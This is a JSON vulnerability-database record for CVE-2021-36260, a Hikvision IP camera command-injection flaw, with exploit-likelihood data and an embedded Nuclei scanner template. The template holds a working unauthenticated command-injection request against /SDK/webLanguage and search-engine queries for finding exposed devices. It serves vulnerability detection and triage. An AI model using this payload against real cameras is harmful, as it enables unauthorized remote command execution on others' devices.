{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2021-36260/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2021-36260/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2021-36260/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2021-36260/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2021-36260/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2021-36260"},"sightings":{"href":"/api/v1/sightings/cve-2021-36260"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.99869,"kev":true,"percentile":0.99963},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2021/CVE-2021-36260.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2021-36260\n\ninfo:\n  name: Hikvision IP camera/NVR - Remote Command Execution\n  author: pdteam,gy741,johnk3r\n  severity: critical\n  description: Certain Hikvision products contain a command injection vulnerability in the web server due to the insufficient input validation. An attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.\n  impact: |\n    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device.\n  remediation: |\n    Apply the latest firmware update provided by Hikvision to mitigate this vulnerability.\n  reference:\n    - https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html\n    - https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-36260\n    - https://github.com/Aiminsun/CVE-2021-36260\n    - https://therecord.media/experts-warn-of-widespread-exploitation-involving-hikvision-cameras/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-36260\n    cwe-id: CWE-78\n    epss-score: 0.99869\n    epss-percentile: 0.99963\n    cpe: cpe:2.3:o:hikvision:ds-2cd2026g2-iu\\/sl_firmware:-:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: hikvision\n    product: ds-2cd2026g2-iu\\/sl_firmware\n    shodan-query: http.favicon.hash:999357577\n    fofa-query: icon_hash=999357577\n  tags: cve2021,cve,hikvision,rce,iot,intrusive,kev,vkev,vuln\nvariables:\n  string: \"{{to_lower(rand_base(12))}}\"\n\nhttp:\n  - raw:\n      - |\n        PUT /SDK/webLanguage HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n        <?xml version=\"1.0\" encoding=\"UTF-8\"?><language>$(echo {{string}}>webLib/x)</language>\n      - |\n        GET /x HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body_2\n        words:\n          - \"{{string}}\"\n# digest: 4b0a00483046022100ba5bb212912f067d5b96978f04f309241620c0ee38439cd3e9e05e10b2d2622a022100b4927bfb30eaea1cf04eba6eb0210a5a1cd1a4dc151012198413d89d6f67e4db:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2021-36260"}